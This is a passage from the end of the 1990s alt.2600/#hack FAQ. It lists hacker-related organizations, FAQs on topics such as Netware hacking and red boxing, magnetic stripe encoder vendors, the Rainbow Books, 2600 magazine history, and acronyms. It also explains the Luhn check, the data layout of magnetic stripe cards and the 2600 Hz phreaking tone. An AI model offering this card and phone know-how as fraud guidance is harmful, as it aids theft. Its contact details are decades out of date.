  6193. Electronic mail: gnu@prep.ai.mit.edu                  0066-3382-0158 (IDC)
  6194.  
  6195. GNU is to be a complete integrated computational environment:
  6196. everything you need to work with a computer, either as a programmer or
  6197. as a person in an office or home.  The core is an operating system,
  6198. which consists of a central program called a kernel that runs the
  6199. other programs on the computer, and a large number of ancillary
  6200. programs for handling files, etc.  The Free Software Foundation is
  6201. developing an advanced kernel called the Hurd.
  6202.  
  6203. A complete system has tools for programmers, such as compilers and
  6204. debuggers.  It also has editors, sketchpads, calendars, calculators,
  6205. spreadsheets, databases, electronic mail readers, and Internet
  6206. navigators.  The FSF already distributes most of the programs used in
  6207. an operating system, all the tools regularly used by programmers, and
  6208. much more.
  6209.  
  6210.  
  6211. The League for Programming Freedom (LPF)
  6212. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6213. The League for Programming Freedom is an organization of people who
  6214. oppose the attempt to monopolize common user interfaces through "look
  6215. and feel" copyright lawsuits.  Some of us are programmers, who worry
  6216. that such monopolies will obstruct our work.  Some of us are users,
  6217. who want new computer systems to be compatible with the interfaces we
  6218. know.  Some are founders of hardware or software companies, such as
  6219. Richard P. Gabriel. Some of us are professors or researchers,
  6220. including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
  6221. Boyer and Patrick Winston.
  6222.  
  6223. "Look and feel" lawsuits aim to create a new class of government-
  6224. enforced monopolies broader in scope than ever before.  Such a system
  6225. of user-interface copyright would impose gratuitous incompatibility,
  6226. reduce competition, and stifle innovation.
  6227.  
  6228. We in the League hope to prevent these problems by preventing
  6229. user-interface copyright.  The League is NOT opposed to copyright law
  6230. as it was understood until 1986 -- copyright on particular programs.
  6231. Our aim is to stop changes in the copyright system which would take
  6232. away programmers' traditional freedom to write new programs compatible
  6233. with existing programs and practices.
  6234.  
  6235. Annual dues for individual members are $42 for employed professionals,
  6236. $10.50 for students, and $21 for others.  We appreciate activists, but
  6237. members who cannot contribute their time are also welcome.
  6238.  
  6239. To contact the League, phone (617) 243-4091, send Internet mail to the
  6240. address league@prep.ai.mit.edu, or write to:
  6241.  
  6242. League for Programming Freedom
  6243. 1 Kendall Square #143
  6244. P.O. Box 9171
  6245. Cambridge, MA 02139 USA
  6246.  
  6247.  
  6248. SotMesc
  6249. ~~~~~~~
  6250. Founded in 1989, SotMesc is dedicated to preserving the integrity and
  6251. cohesion of the computing society.  By promoting computer education,
  6252. liberties and efficiency, we believe we can secure freedoms for all
  6253. computer users while retaining privacy.
  6254.  
  6255. SotMesc maintains the CSP Internet mailing list, the SotMesc
  6256. Scholarship Fund, and the SotMesc Newsletter.
  6257.  
  6258. The SotMESC is financed partly by membership fees, and donations, but
  6259. mostly by selling hacking, cracking, phreaking, electronics, internet,
  6260. and virus information and programs on disk and bound paper media.
  6261.  
  6262. SotMesc memberships are $20 to students and $40 to regular members.
  6263.  
  6264. SotMESC
  6265. P.O. Box 573
  6266. Long Beach, MS  39560
  6267.  
  6268.  
  6269. Computer Emergency Response Team (CERT
  6270. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6271.  
  6272. CERT is the Computer Emergency Response Team that was formed by the
  6273. Defense Advanced Research Projects Agency (DARPA) in November 1988 in
  6274. response to the needs exhibited during the Internet worm incident.
  6275. The CERT charter is to work with the Internet community to facilitate
  6276. its response to computer security events involving Internet hosts, to
  6277. take proactive steps to raise the community's awareness of computer
  6278. security issues, and to conduct research targeted at improving the
  6279. security of existing systems.
  6280.  
  6281. CERT products and services include 24-hour technical assistance for
  6282. responding to computer security incidents, product vulnerability
  6283. assistance, technical documents, and seminars.  In addition, the team
  6284. maintains a number of mailing lists (including one for CERT
  6285. advisories) and provides an anonymous FTP server:  cert.org
  6286. (192.88.209.5), where security-related documents, past CERT
  6287. advisories, and tools are archived.
  6288.  
  6289. CERT contact information:
  6290.  
  6291. U.S. mail address
  6292.   CERT Coordination Center
  6293.   Software Engineering Institute
  6294.   Carnegie Mellon University
  6295.   Pittsburgh, PA 15213-3890
  6296.   U.S.A.
  6297.  
  6298. Internet E-mail address
  6299.   cert@cert.org
  6300.  
  6301. Telephone number
  6302.   (412)268-7090 (24-hour hotline)
  6303.   CERT Coordination Center personnel answer
  6304.   7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
  6305.   emergencies during other hours.
  6306.  
  6307. FAX number
  6308.   (412)268-6989
  6309.  
  6310.  
  6311. 15. What are some radio programs of interest to hackers?
  6312.  
  6313.  
  6314. Off The Hook          New York      99.5 FM                       Tue  8pm EST
  6315. Full Disclosure Live  Short Wave    WWCR 5065 khz                 Sun  8pm EST
  6316. Full Disclosure Live  Oil City, PA  WOYL AM-1340                  Sun  8pm EST
  6317. Full Disclosure Live  Satellite     Telstar 302 (T2), Ch 21, 5.8  Sun  8pm EST
  6318.  
  6319.  
  6320. 16. What are other FAQ's of interest to hackers?
  6321.  
  6322. Frequently Asked Questions "Hacking Novell Netware"
  6323. Author: Simple Nomad <sn@spyder.org>
  6324. ftp: jumper.mcc.ac.uk    /pub/security/netware/faq.zip
  6325. ftp: ftp.fastlane.net    /pub/nomad/nw/faq.zip
  6326. ftp: ftp.best.com        /pub/almcepud/hacks/faq.zip
  6327. http://resudox.net/bio/mainpage.html
  6328. http://www.hookup.net/~apayne/nwhack.html
  6329.  
  6330. The PGP Attack FAQ
  6331. Author: Route [daemon9@netcom.com / route@infonexus.com]
  6332. ftp: infonexus.com /pub/Philes/Cryptography/PGPattackFAQ.txt.gz
  6333.  
  6334. Mac Hack FAQ: Defeating Security
  6335. Author: AX1P (an149689@anon.penet.fi)
  6336.  
  6337. Frequently Asked Questions About Red Boxing
  6338. Author: Mr. Sandman (an132432@anon.penet.fi)
  6339.  
  6340. VMS FAQ (Frequently Ask Questions)
  6341. Author: The Beaver (beaver@upperdck.blkbox.com)
  6342.  
  6343. Anonymous FTP FAQ
  6344. Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
  6345. ftp: ftp.iss.net    /pub/faq/anonftp
  6346.  
  6347. Compromise FAQ: What if your Machines are Compromised by an Intruder
  6348. Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
  6349. ftp: ftp.iss.net    /pub/faq/compromise
  6350.  
  6351. Security Patches FAQ
  6352. Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
  6353. ftp: ftp.iss.net    /pub/faq/patch
  6354.  
  6355. Sniffer FAQ
  6356. Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
  6357. ftp: ftp.iss.net    /pub/faq/sniff
  6358.  
  6359. Vendor Security Contacts: Reporting Vulnerabilities and Obtaining New Patches
  6360. Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
  6361. ftp: ftp.iss.net    /pub/faq/vendor
  6362.  
  6363. Cryptography FAQ
  6364. Author: The Crypt Cabal
  6365. ftp: rtfm.mit.edu /pub/usenet-by-group/sci.crypt/
  6366.  
  6367. Firewalls FAQ
  6368. Author: Marcus J. Ranum (mjr@ss1.lightspeed.net)
  6369. ftp: rtfm.mit.edu /pub/usenet-by-group/comp.security.misc/
  6370.  
  6371. Buying a Used Scanner Radio
  6372. Author: parnass@att.com (Bob Parnass, AJ9S)
  6373. ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/
  6374.  
  6375. How to Find Scanner Frequencies
  6376. Author: parnass@att.com (Bob Parnass, AJ9S)
  6377. ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/
  6378.  
  6379. Introduction to Scanning
  6380. Author: parnass@att.com (Bob Parnass, AJ9S)
  6381. ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/
  6382.  
  6383. Low Power Broadcasting FAQ
  6384. Author: Rick Harrison.
  6385. ftp: rtfm.mit.edu /pub/usenet-by-group/alt.radio.pirate/
  6386.  
  6387. RSA Cryptography Today FAQ
  6388. Author: Paul Fahn
  6389. ftp: rtfm.mit.edu /pub/usenet-by-group/sci.crypt/
  6390.  
  6391. VIRUS-L comp.virus Frequently Asked Questions (FAQ)
  6392. Author: Kenneth R. van Wyk <krvw@cert.org>
  6393. ftp: rtfm.mit.edu /pub/usenet-by-group/comp.virus/
  6394.  
  6395. Where to get the latest PGP (Pretty Good Privacy) FAQ
  6396. Author: mpj@csn.net (Michael Johnson)
  6397. ftp: rtfm.mit.edu /pub/usenet-by-group/alt.security.pgp/
  6398.  
  6399. alt.locksmithing answers to Frequently Asked Questions (FAQ)
  6400. Author: spike@indra.com (Joe Ilacqua)
  6401. ftp: rtfm.mit.edu /pub/usenet-by-group/alt.locksmithing/
  6402.  
  6403. comp.os.netware.security FAQ
  6404. Author: Fauzan Mirza <F.U.Mirza@sheffield.ac.uk>
  6405. ftp: rtfm.mit.edu /pub/usenet-by-group/comp.os.netware.security/
  6406.  
  6407. rec.pyrotechnics FAQ
  6408. Author: zoz@cs.adelaide.edu.au (Hans Josef Wagemueller)
  6409. ftp: rtfm.mit.edu /pub/usenet-by-group/rec.pyrotechnics/
  6410.  
  6411.  
  6412. 17. Where can I purchase a magnetic stripe encoder/decoder?
  6413.  
  6414. CPU Advance
  6415. PO Box 2434
  6416. Harwood Station
  6417. Littleton, MA  01460
  6418. (508)624-4819 (Fax)
  6419.  
  6420. Omron Electronics, Inc.
  6421. One East Commerce Drive
  6422. Schaumburg, IL  60173
  6423. (800)556-6766 (Voice)
  6424. (708)843-7787 (Fax)
  6425.  
  6426. Security Photo Corporation
  6427. 1051 Commonwealth Avenue
  6428. Boston, MA 02215
  6429. (800)533-1162 (Voice)
  6430. (617)783-3200 (Voice)
  6431. (617)783-1966 (Voice)
  6432.  
  6433. Timeline Inc,
  6434. 23605 Telo Avenue
  6435. Torrence, CA 90505
  6436. (800)872-8878 (Voice)
  6437. (800)223-9977 (Voice)
  6438.  
  6439. Alltronics
  6440. 2300 Zanker Road
  6441. San Jose CA 95131
  6442. (408) 943-9774 Voice
  6443. (408) 943-9776 Fax
  6444. (408) 943-0622 BBS
  6445. Part Number: 92U067
  6446.  
  6447. Atalla Corp
  6448. San Jose, CA
  6449. (408) 435-8850
  6450.  
  6451.  
  6452. 18. What are the rainbow books and how can I get them?
  6453.  
  6454. Orange Book
  6455. DoD 5200.28-STD
  6456. Department of Defense Trusted Computer System Evaluation Criteria
  6457.  
  6458. Green Book
  6459. CSC-STD-002-85
  6460. Department of Defense Password Management Guideline
  6461.  
  6462. Yellow Book
  6463. CSC-STD-003-85
  6464. Computer Security Requirements -- Guidance for Applying the Department
  6465. of Defense Trusted Computer System Evaluation Criteria in Specific
  6466. Environments
  6467.  
  6468. Yellow Book
  6469. CSC-STD-004-85
  6470. Technical Rationale Behind CSC-STD-003-85: Computer Security
  6471. Requirements.  Guidance for Applying the Department of Defense Trusted
  6472. Computer System Evaluation Criteria in Specific Environments.
  6473.  
  6474. Tan Book
  6475. NCSC-TG-001
  6476. A Guide to Understanding Audit in Trusted Systems
  6477.  
  6478. Bright Blue Book
  6479. NCSC-TG-002
  6480. Trusted Product Evaluation - A Guide for Vendors
  6481.  
  6482. Neon Orange Book
  6483. NCSC-TG-003
  6484. A Guide to Understanding Discretionary Access Control in Trusted
  6485. Systems
  6486.  
  6487. Teal Green Book
  6488. NCSC-TG-004
  6489. Glossary of Computer Security Terms
  6490.  
  6491. Red Book
  6492. NCSC-TG-005
  6493. Trusted Network Interpretation of the Trusted Computer System
  6494. Evaluation Criteria
  6495.  
  6496. Orange Book
  6497. NCSC-TG-006
  6498. A Guide to Understanding Configuration Management in Trusted Systems
  6499.  
  6500. Burgundy Book
  6501. NCSC-TG-007
  6502. A Guide to Understanding Design Documentation in Trusted Systems
  6503.  
  6504. Dark Lavender Book
  6505. NCSC-TG-008
  6506. A Guide to Understanding Trusted Distribution in Trusted Systems
  6507.  
  6508. Venice Blue Book
  6509. NCSC-TG-009
  6510. Computer Security Subsystem Interpretation of the Trusted Computer
  6511. System Evaluation Criteria
  6512.  
  6513. Aqua Book
  6514. NCSC-TG-010
  6515. A Guide to Understanding Security Modeling in Trusted Systems
  6516.  
  6517. Dark Red Book
  6518. NCSC-TG-011
  6519. Trusted Network Interpretation Environments Guideline -- Guidance for
  6520. Applying the Trusted Network Interpretation
  6521.  
  6522. Pink Book
  6523. NCSC-TG-013
  6524. Rating Maintenance Phase -- Program Document
  6525.  
  6526. Purple Book
  6527. NCSC-TG-014
  6528. Guidelines for Formal Verification Systems
  6529.  
  6530. Brown Book
  6531. NCSC-TG-015
  6532. A Guide to Understanding Trusted Facility Management
  6533.  
  6534. Yellow-Green Book
  6535. NCSC-TG-016
  6536. Guidelines for Writing Trusted Facility Manuals
  6537.  
  6538. Light Blue
  6539. NCSC-TG-017
  6540. A Guide to Understanding Identification and Authentication in Trusted
  6541. Systems
  6542.  
  6543. Light Blue Book
  6544. NCSC-TG-018
  6545. A Guide to Understanding Object Reuse in Trusted Systems
  6546.  
  6547. Blue Book
  6548. NCSC-TG-019
  6549. Trusted Product Evaluation Questionnaire
  6550.  
  6551. Gray Book
  6552. NCSC-TG-020A
  6553. Trusted Unix Working Group (TRUSIX) Rationale for Selecting
  6554. Access Control List Features for the Unix System
  6555.  
  6556. Lavender Book
  6557. NCSC-TG-021
  6558. Trusted Data Base Management System Interpretation of the Trusted
  6559. Computer System Evaluation Criteria
  6560.  
  6561. Yellow Book
  6562. NCSC-TG-022
  6563. A Guide to Understanding Trusted Recovery in Trusted Systems
  6564.  
  6565. Bright Orange Book
  6566. NCSC-TG-023
  6567. A Guide to Understandng Security Testing and Test Documentation in
  6568. Trusted Systems
  6569.  
  6570. Purple Book
  6571. NCSC-TG-024  (Volume 1/4)
  6572. A Guide to Procurement of Trusted Systems: An Introduction to
  6573. Procurement Initiators on Computer Security Requirements
  6574.  
  6575. Purple Book
  6576. NCSC-TG-024 (Volume 2/4)
  6577. A Guide to Procurement of Trusted Systems: Language for RFP
  6578. Specifications and Statements of Work - An Aid to Procurement
  6579. Initiators
  6580.  
  6581. Purple Book
  6582. NCSC-TG-024  (Volume 3/4)
  6583. A Guide to Procurement of Trusted Systems: Computer Security Contract
  6584. Data Requirements List and Data Item Description Tutorial
  6585.  
  6586. +Purple Book
  6587. +NCSC-TG-024  (Volume 4/4)
  6588. +A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
  6589. +Proposal Document - An Aid to Procurement Initiators and Contractors
  6590.  
  6591. Green Book
  6592. NCSC-TG-025
  6593. A Guide to Understanding Data Remanence in Automated Information
  6594. Systems
  6595.  
  6596. Hot Peach Book
  6597. NCSC-TG-026
  6598. A Guide to Writing the Security Features User's Guide for Trusted Systems
  6599.  
  6600. Turquiose Book
  6601. NCSC-TG-027
  6602. A Guide to Understanding Information System Security Officer
  6603. Responsibilities for Automated Information Systems
  6604.  
  6605. Violet Book
  6606. NCSC-TG-028
  6607. Assessing Controlled Access Protection
  6608.  
  6609. Blue Book
  6610. NCSC-TG-029
  6611. Introduction to Certification and Accreditation
  6612.  
  6613. Light Pink Book
  6614. NCSC-TG-030
  6615. A Guide to Understanding Covert Channel Analysis of Trusted Systems
  6616.  
  6617. C1 Technical Report-001
  6618. Computer Viruses: Prevention, Detection, and Treatment
  6619.  
  6620. *C Technical Report 79-91
  6621. *Integrity in Automated Information Systems
  6622.  
  6623. *C Technical Report 39-92
  6624. *The Design and Evaluation of INFOSEC systems: The Computer Security
  6625. *Contributions to the Composition Discussion
  6626.  
  6627. NTISSAM COMPUSEC/1-87
  6628. Advisory Memorandum on Office Automation Security Guideline
  6629.  
  6630. --
  6631.  
  6632. You can get your own free copy of any or all of the books by writing
  6633. or calling:
  6634.  
  6635.        INFOSEC Awareness Division
  6636.        ATTN: X711/IAOC
  6637.        Fort George G. Meade, MD  20755-6000
  6638.  
  6639.        Barbara Keller
  6640.        (410) 766-8729
  6641.  
  6642. If you ask to be put on the mailing list, you'll get a copy of each new
  6643. book as it comes out (typically a couple a year).
  6644.  
  6645. [* == I have not personally seen this book]
  6646. [+ == I have not personally seen this book, and I believe it may not]
  6647. [     be available]
  6648.  
  6649.  
  6650.  
  6651.  
  6652. Section E: 2600
  6653. ~~~~~~~~~~~~~~~
  6654.  
  6655. 01. What is alt.2600?
  6656.  
  6657. Alt.2600 is a Usenet newsgroup for discussion of material relating to
  6658. 2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
  6659. game machine.  Len@netsys.com created the group on Emmanuel
  6660. Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
  6661. Magazine. Following the barrage of postings about the Atari machine to
  6662. alt.2600, an alt.atari.2600 was created to divert all of the atari
  6663. traffic from alt.2600.  Atari 2600 people are advised to hie over to
  6664. rec.games.video.classic.
  6665.  
  6666.  
  6667. 02. What does "2600" mean?
  6668.  
  6669. .2600Hz was a tone that was used by early phone phreaks (or
  6670. phreakers) in the 80's, and some currently.  If the tone was sent down the
  6671. line at the proper time, one could get away with all sorts of fun stuff.  
  6672.  
  6673. A note from Emmanuel Goldstein:
  6674. .
  6675. "The Atari 2600 has NOTHING to do with blue boxes or telephones
  6676. or the 2600 hertz tone.  The 2600 hertz tone was simply the first
  6677. step towards exploring the network.  If you were successful at 
  6678. getting a toll call to drop, then billing would stop at that
  6679. point but there would be billing for the number already dialed
  6680. up until the point of seizure.  800 numbers and long distance
  6681. information were both free in the past and records of who called
  6682. what were either non-existent or very obscure with regards to
  6683. these numbers.  This, naturally, made them more popular than
  6684. numbers that showed up on a bill, even if it was only for
  6685. a minute.  Today, many 800 numbers go overseas, which provides
  6686. a quick and free way into another country's phone system
  6687. which may be more open for exploration."
  6688.  
  6689.  
  6690. 03. Are there on-line versions of 2600 available?
  6691.  
  6692. .No.
  6693.  
  6694.  
  6695. 04. I can't find 2600 at any bookstores.  What can I do?
  6696.  
  6697. Subscribe.  Or, let 2600 know via the subscription address that you
  6698. think 2600 should be in the bookstore.  Be sure to include the
  6699. bookstores name and address.
  6700.  
  6701.  
  6702. 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  6703.  
  6704. A note from Emmanuel Goldstein:
  6705.  
  6706.   We've been selling 2600 at the same newsstand price ($4) since 1988
  6707.   and we hope to keep it at that price for as long as we can get away
  6708.   with it. At the same time, $21 is about the right price to cover
  6709.   subscriber costs, including postage and record keeping, etc. People
  6710.   who subscribe don't have to worry about finding an issue someplace,
  6711.   they tend to get issues several weeks before the newsstands get
  6712.   them, and they can take out free ads in the 2600 Marketplace.
  6713.  
  6714.   This is not uncommon in the publishing industry.  The NY Times, for
  6715.   example, costs $156.50 at the newsstands, and $234.75 delivered to your
  6716.   door.
  6717.  
  6718.  
  6719.  
  6720.  
  6721. Section F: Miscellaneous
  6722. ~~~~~~~~~~~~~~~~~~~~~~~~
  6723.  
  6724. 01. What does XXX stand for?
  6725.  
  6726. TLA     Three Letter Acronym
  6727.  
  6728. ACL     Access Control List
  6729. PIN     Personal Identification Number
  6730. TCB     Trusted Computing Base
  6731.  
  6732. ALRU    Automatic Line Record Update
  6733. AN      Associated Number
  6734. ARSB    Automated Repair Service Bureau
  6735. ATH     Abbreviated Trouble History
  6736. BOC     Bell Operating Company
  6737. BOR     Basic Output Report
  6738. BOSS    Business Office Servicing System
  6739. CA      Cable
  6740. COE     Central Office Equipment
  6741. COSMOS  Computer System for Main Frame Operations
  6742. CMC     Construction Maintenance Center
  6743. CNID    Calling Number IDentification
  6744. CO      Central Office
  6745. COCOT   Customer Owned Coin Operated Telephone
  6746. CRSAB   Centralized Repair Service Answering Bureau
  6747. DID     Direct Inbound Dialing
  6748. DDD     Direct Distance Dialing
  6749. ECC     Enter Cable Change
  6750. LD      Long Distance
  6751. LMOS    Loop Maintenance Operations System
  6752. MLT     Mechanized Loop Testing
  6753. NPA     Numbering Plan Area
  6754. PBX     Private Branch Exchange
  6755. POTS    Plain Old Telephone Service
  6756. RBOC    Regional Bell Operating Company
  6757. RSB     Repair Service Bureau
  6758. SS      Special Service
  6759. TAS     Telephone Answering Service
  6760. TH      Trouble History
  6761. TREAT   Trouble Report Evaluation and Analysis Tool
  6762.  
  6763. LOD     Legion of Doom
  6764. HFC     Hell Fire Club
  6765. TNO     The New Order
  6766.  
  6767. ACiD    Ansi Creators in Demand
  6768. CCi     Cybercrime International
  6769. FLT     Fairlight
  6770. iCE     Insane Creators Enterprise
  6771. iNC     International Network of Crackers
  6772. NTA     The Nocturnal Trading Alliance
  6773. PDX     Paradox
  6774. PE      Public Enemy
  6775. PSY     Psychose
  6776. QTX     Quartex
  6777. RZR     Razor (1911)
  6778. S!P     Supr!se Productions
  6779. TDT     The Dream Team
  6780. THG     The Humble Guys
  6781. THP     The Hill People
  6782. TRSI    Tristar Red Sector Inc.
  6783. UUDW    Union of United Death Workers
  6784.  
  6785.  
  6786. 02. How do I determine if I have a valid credit card number?
  6787.  
  6788. Credit cards use the Luhn Check Digit Algorithm.  The main purpose of
  6789. this algorithm is to catch data entry errors, but it does double duty
  6790. here as a weak security tool.
  6791.  
  6792. For a card with an even number of digits, double every odd numbered
  6793. digit and subtract 9 if the product is greater than 9.  Add up all the
  6794. even digits as well as the doubled-odd digits, and the result must be
  6795. a multiple of 10 or it's not a valid card.  If the card has an odd
  6796. number of digits, perform the same addition doubling the even numbered
  6797. digits instead.
  6798.  
  6799.  
  6800. 03. What is the layout of data on magnetic stripe cards?
  6801.  
  6802. A standard card may have any of three tracks, or a combination of these
  6803. tracks.
  6804.  
  6805. Track 1 was the first track standardized.  It was developed by the
  6806. International Air Transportation Association (IATA) and is still
  6807. reserved for their use.  It is 210bpi with room for 79 characters.  It
  6808. includes the primary account number (up to 18 digits) and the name (up
  6809. to 26 alphanumeric characters).
  6810.  
  6811. Track 2 was developed by the American Bankers Association (ABA) for
  6812. on-line financial transactions.  It is 75bpi with room for 40 numeric
  6813. characters.  It includes the account number (up to 19 digits).
  6814.  
  6815. Track 3 is also used for financial transactions.  The difference is its
  6816. read/write ability.  It is 210bpi with room for 107 numeric digits.  It
  6817. includes an enciphered PIN, country code, currency units, amount
  6818. authorized, subsidiary account information and other restrictions.
  6819.  
  6820. For more information, read the ANSI/ISO 7811/1-5 standard.  This
  6821. document is available from the American Bankers Association.
  6822.  
  6823.  
  6824. 04. What are the ethics of hacking?
  6825.  
  6826. An excerpt from: Hackers: Heroes of the Computer Revolution
  6827.                           by Steven Levy
  6828.  
  6829.         Access to computers -- and anything which might teach you
  6830.         something about the way the world works -- should be unlimited
  6831.         and total. Always yield to the Hands-On imperative.
  6832.  
  6833.         All information should be free.
  6834.  
  6835.         Mistrust Authority.  Promote Decentralization.
  6836.  
  6837.         Hackers should be judged by their hacking, not bogus criteria
  6838.         such as degrees, age, race, or position.
  6839.  
  6840.         You can create art and beauty on a computer.
  6841.  
  6842.         Computers can change your life for the better.
  6843.  
  6844.  
  6845. 05. Where can I get a copy of the alt.2600/#hack FAQ?
  6846.  
  6847. Get it on FTP at:
  6848. rahul.net      /pub/lps/sysadmin/
  6849. rtfm.mit.edu   /pub/usenet-by-group/alt.2600
  6850. clark.net      /pub/jcase/
  6851.  
  6852. Get it on the World Wide Web at:
  6853. http://www.engin.umich.edu/~jgotts/underground/hack-faq.html
  6854.  
  6855. Get it on my BBS:
  6856. Hacker's Haven (303)343-4053
  6857.  
  6858.  
  6859.  
  6860.  
  6861.  
  6862. EOT
  6863.  
  6864.